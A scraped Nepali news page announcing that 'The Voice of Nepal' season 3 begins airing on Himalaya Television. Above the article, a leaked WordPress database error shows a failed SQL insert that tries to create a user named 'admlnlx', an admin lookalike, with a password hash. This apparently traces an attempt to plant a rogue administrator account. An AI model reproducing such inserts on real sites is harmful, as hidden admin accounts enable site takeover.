WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvjklVbn3ye/Ae5YTW3QShdzrIWFJj.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 23:50:43', '', 'admlnlx', 'admlnlx')

‘दि भ्वाइस अफ नेपाल ३’आजबाट प्रशारण हुँदै – Gaule Khabar

‘दि भ्वाइस अफ नेपाल ३’आजबाट प्रशारण हुँदै

‘दि भ्वाइस अफ नेपाल ३’आजबाट प्रशारण हुँदै
फोटो सामाजिक सञ्जाल

काठमाण्डौ । हिमालय टेलिभिजनमा चर्चित रियालिटी शो ‘दि भ्वाइस अफ नेपाल सिजन ३’ आजबाट प्रशारण हुने भएको छ । बेलुकी ८ बजेबाट शो प्रशारण हुन लागेको हो ।
आजबाट शोमा ब्लाइन्ड अडिसन प्रशारण हुनेछ । यो राउन्डमा कोचको कुर्सी घुमाउन सफल प्रतिस्पर्धी कुनै एक कोचको साथमा अघिल्लो राउन्डमा प्रवेश गर्नेछन् । ‘दि भ्वाइस अफ नेपाल’को सबैभन्दा रोमाञ्चक राउन्डको रुपमा ‘ब्लाइन्ड अडिसन’लाई लिइन्छ ।

शोको निर्णायकमा दिप श्रेष्ठ, राजु लामा, प्रमोद खरेल र तृष्णा गुरुङ कोचको रुपमा छन् । लक्ष्मण पौडेल निर्देशक हुन् । नेपालकै नम्बर १ गायन रियालिटी शोको रुपमा रहेको यो शोको अघिल्ला सिजनलाई दर्शकले अत्याधिक मन पराएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका